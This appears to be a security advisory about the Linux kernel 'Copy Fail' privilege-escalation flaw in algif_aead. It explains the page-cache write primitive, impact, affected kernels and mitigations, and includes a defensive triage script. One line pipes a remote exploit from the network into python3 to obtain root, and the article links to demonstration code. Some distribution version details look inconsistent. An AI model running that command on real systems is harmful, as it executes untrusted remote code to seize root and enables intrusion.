Linux Kernel’s ‘Copy Fail’ CVE‑2026‑31431: A 732‑Byte Python Script Grants Root in One Step
A newly disclosed Linux kernel vulnerability (CVE‑2026‑31431, dubbed “Copy Fail”) allows an unprivileged user to execute a 732‑byte Python script that writes four controllable bytes into the page cache, directly modifying /usr/bin/su to obtain root, affecting all kernels from 2017 to the patch release and posing severe risks such as container escape and cloud‑tenant isolation breaches.
Abstract
On 2026‑04‑29 security researchers disclosed a high‑severity local privilege‑escalation vulnerability in the Linux kernel, CVE‑2026‑31431 “Copy Fail”. A 732‑byte Python script can elevate a regular user to root and may enable container escape and breach of cloud‑tenant isolation.
Vulnerability Overview
CVE: CVE-2026-31431
Name: Copy Fail
Discoverer: Theori Xint Code team
Severity: High (local privilege escalation, container escape)
One‑Sentence Description
The bug resides in the algif_aead crypto interface, introduced by a 2017 in‑place optimization commit 72548b093ee3. It allows a non‑privileged user to write four arbitrary bytes into the kernel page cache via an AF_ALG socket combined with the splice() system call, corrupting setuid binaries such as /usr/bin/su to gain root.
Technical Background
AF_ALG: user-space cryptographic socket interface exposed to all users.
AEAD: authenticated encryption mode (e.g., AES-GCM).
authencesn template: a specific AEAD implementation that writes data into the destination buffer during decryption.
splice(): system call that transfers data between file descriptors without copying, used here to link a file's page cache with socket buffers.
Core Logic Flaw
During decryption the page‑cache page of the target file is linked to a writable scatterlist.
The authencesn decryption routine writes four bytes to the page before verifying the authentication tag.
This provides a fully controllable four‑byte write primitive directly into the page cache.
Why It Is Dangerous
No race conditions, kernel‑specific offsets, or retries are required—the attack path is linear.
The write bypasses the normal VFS write path and does not mark the page dirty, so the on-disk file is never updated and file-integrity checks do not see the modification.
Page cache is globally shared; any process reading the altered file sees the tampered version.
Containers share the same page cache with the host, enabling cross‑container infection.
Impact Scenarios
Multi-user shared hosts (development machines, jump hosts, build servers): any regular user can obtain root and fully control the host.
Kubernetes / container clusters: low-privilege processes inside containers can corrupt the host's page cache, achieving container escape and host takeover.
CI/CD pipelines (GitHub Actions self-hosted runners, GitLab Runner, Jenkins agents): untrusted PR code can root the runner host.
Cloud services (notebook hosting, sandboxes, serverless): tenant code can break isolation and access the host.
Standard single-tenant servers: when combined with other exploits, low-privilege access can lead to privilege escalation.
Personal desktops/laptops: local code execution can easily obtain root; remote exploitation requires additional conditions.
Affected Range
All Linux kernels built from 2017 up to the patch commit are vulnerable, covering the majority of mainstream distributions.
Confirmed Affected Distributions
Ubuntu 24.04 LTS (kernel 6.17.0‑1007‑aws)
Amazon Linux 2023 (kernel 6.18.8‑9.213.amzn2023)
RHEL 14.3 (kernel 6.12.0‑124.45.1.el10_1)
SUSE 16 (kernel 6.12.0‑160000.9‑default)
Theoretically Affected Distributions
Debian, Arch Linux, Fedora, Rocky Linux, AlmaLinux, Oracle Linux, and many embedded/custom systems.
Vulnerable Kernel Versions
Versions 4.14 up to the last unpatched release.
Versions not affected: 6.18.22+, 6.19.12+, 7.0+.
Remediation
Immediate Update
Upgrade the kernel to a version that includes commit a664bf3d603d.
Ubuntu/Debian: install the latest linux-image package from official security advisories.
RHEL/CentOS/Rocky/Alma: monitor Red Hat security updates; the fix for RHEL 10/8/9 is currently “Fix deferred”.
Amazon Linux: follow AWS security announcements; the fix is pending.
Temporary Mitigation
Disable the vulnerable algif_aead kernel module to block exploitation:
# Unload the module (if AEAD sockets are not in use)
sudo rmmod algif_aead
# Or blacklist it permanently via modprobe
echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf
Warning: Disabling this module disables the user-space AEAD crypto interface, which may affect applications such as certain VPNs or TLS libraries.
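As an added example (not code from the advisory or from Theori), the POSIX shell helper below turns the version ranges and the module mitigation described on this page into a triage script: it classifies a uname -r string against the fixed versions listed under Vulnerable Kernel Versions, reports whether algif_aead is built in, loaded, loadable or disabled, and, when run as root with the assumed --disable switch, writes the blacklist drop-in above together with a modprobe.d install rule. The version floors and the drop-in path are the advisory's; the install rule and the builtin check are additions, as the comments note.

```shell
#!/bin/sh
# Added helper for CVE-2026-31431 (example code, not the advisory's or Theori's).
# Assumes the advisory's version floors: affected 4.14+, fixed 6.18.22+/6.19.12+/7.0+.
# Distro kernels that backport the fix keep an old version string, so "vulnerable"
# below means "not provably fixed by version"; algif_aead_state is the local signal.
# classify_kernel VERSION -> prints fixed | vulnerable | outside-range | unknown
# (outside-range: older than 4.14, which the advisory does not list as affected)
classify_kernel() {
    v=${1%%-*}                                   # "6.12.0-124.45.1.el10_1" -> "6.12.0"
    maj=$(printf '%s\n' "$v" | cut -d. -f1)
    min=$(printf '%s\n' "$v" | cut -s -d. -f2)
    pat=$(printf '%s\n' "$v" | cut -s -d. -f3)
    pat=${pat%%[!0-9]*}; min=${min:-0}; pat=${pat:-0}   # "22+" -> 22; "6.18" -> 6.18.0
    case "$maj$min$pat" in ''|*[!0-9]*) echo unknown; return ;; esac
    if [ "$maj" -lt 4 ] || { [ "$maj" -eq 4 ] && [ "$min" -lt 14 ]; }; then
        echo outside-range; return
    fi
    if [ "$maj" -ge 7 ]; then echo fixed; return; fi
    if [ "$maj" -eq 6 ] && [ "$min" -eq 18 ] && [ "$pat" -ge 22 ]; then echo fixed; return; fi
    if [ "$maj" -eq 6 ] && [ "$min" -eq 19 ] && [ "$pat" -ge 12 ]; then echo fixed; return; fi
    echo vulnerable
}

# algif_aead_state -> builtin | loaded | disabled | loadable. builtin: compiled in, so
# rmmod/blacklist cannot help, only the kernel update can; disabled: a modprobe.d
# "install" rule refuses loading; loadable: the first AF_ALG aead socket would autoload it.
algif_aead_state() {
    if grep -q 'algif_aead' "/lib/modules/$(uname -r)/modules.builtin" 2>/dev/null; then
        echo builtin
    elif grep -q '^algif_aead ' /proc/modules 2>/dev/null; then
        echo loaded
    elif modprobe -n -v algif_aead 2>/dev/null | grep -q '^install '; then
        echo disabled
    else
        echo loadable
    fi
}

# disable_algif_aead (root) -> the advisory's blacklist drop-in plus an "install" rule,
# because "blacklist" only stops alias-based autoload, not a by-name modprobe.
disable_algif_aead() {
    printf 'blacklist algif_aead\ninstall algif_aead /bin/false\n' \
        > /etc/modprobe.d/blacklist-algif_aead.conf        # path from the advisory
    grep -q '^algif_aead ' /proc/modules 2>/dev/null && rmmod algif_aead
}

case "${1:-}" in
    --disable) disable_algif_aead ;;
    *) printf 'kernel %s: %s, algif_aead: %s\n' "$(uname -r)" "$(classify_kernel "$(uname -r)")" "$(algif_aead_state)" ;;
esac
```

Without arguments the script only reads /proc/modules and uname -r, so it is safe to run on production hosts; the --disable path needs root and should be combined with the kernel update, never used in place of it.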
Verifying Vulnerability
Check whether the module is loaded:
lsmod | grep algif_aead
Test the PoC (authorized environments only):
curl https://copy.fail/exp | python3 && su
Brief Summary
A 732‑byte Python script can obtain root without kernel debugging, network access, or race conditions.
The flaw resides in the kernel crypto subsystem and has existed from 2017 to 2026, affecting a wide range of distributions.
The primary threat is container escape, allowing an attacker to jump from a compromised container to the host and break tenant isolation.
Patch priority is extremely high, especially in shared‑kernel scenarios such as cloud, Kubernetes, and CI/CD pipelines.
Demonstration code:
https://github.com/theori-io/copy-fail-CVE-2026-31431
This article provides a security advisory and defensive guidance; do not test the exploit on unauthorized systems.
Black & White Path